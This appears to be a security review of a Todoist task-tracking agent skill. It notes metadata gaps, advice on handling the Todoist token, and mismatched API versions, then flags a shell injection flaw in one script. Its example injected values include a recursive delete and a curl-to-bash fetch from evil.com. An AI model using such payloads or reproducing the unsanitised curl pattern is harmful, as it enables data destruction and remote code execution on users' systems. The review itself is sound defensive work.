Todoist 任务可见性管理

基于 Todoist 的任务可见性管理。用于创建、更新和追踪任务状态（进行中🟡、等待中🟠、已完成🟢），并记录进度评论。当用户提到 Todoist 任务管理、任务状态追踪、或需要使用 Todoist API 时触发。

要点与建议： - 不一致性：注册元数据未声明任何必需的环境变量或二进制依赖，但 SKILL.md 和脚本都需要 TODOIST_TOKEN、项目和 section ID 及命令行工具（curl，文档中也提到 jq）。在安装/启用前要求发布者更新技能元数据或在本地明确提供这些值。 - 权限与秘密管理：TODOIST_TOKEN 是敏感凭证（可访问你的 Todoist 数据）。仅在信任此技能来源时提供，并尽可能使用有限权限或专用账号/令牌，避免把长期全局 token 暴露给未知第三方。将 token 存放在安全位置（例如受限环境变量或秘密管理器），不要在共享日志或公共仓库中泄露。 - API 版本差异：脚本中 API_BASE 在不同脚本里使用了不同的路径（scripts/add_comment.sh 使用 https://api.todoist.com/rest/v2，而其他脚本使用 https://api.todoist.com/api/v1）。这可能导致兼容性或行为差异（例如 comments 接口在不同版本下的参数或路径不同）。建议在部署前测试每个脚本并让作者统一 API 版本或在文档中解释差异。 - 运行环境：脚本在本地执行（无远程安装），依赖 curl 和 （文档）jq。建议在隔离环境（非生产、或容器/VM）中先运行并观察网络请求/日志，确认行为符合预期。 - 需要发布者澄清的项：更新 registry 元数据以列出 TODOIST_TOKEN、TODOIST_PROJECT_ID、SECTION_* 为必需项并将 TODOIST_TOKEN 标示为 primary credential；明确是否需要 jq；解释为什么使用不同的 API 端点（v1 vs rest/v2）。 总体建议：脚本看起来并非恶意，但有元数据与实现的不一致和工程细节需先澄清并在安全环境中测试，确认后再在生产环境中长期使用。

Type: OpenClaw Skill Name: todoist-visibility Version: 1.0.0 The skill bundle is classified as suspicious due to critical shell injection vulnerabilities found in `scripts/todoist_api.sh`. The script directly uses user-supplied arguments `$METHOD` and `$ENDPOINT` in `curl` commands without proper sanitization or validation, allowing an attacker to inject arbitrary shell commands (e.g., `GET; rm -rf /` or `tasks; curl evil.com | bash`) for remote code execution. While there is no explicit malicious payload or exfiltration code within the provided files, this vulnerability allows for such actions to be performed by an attacker.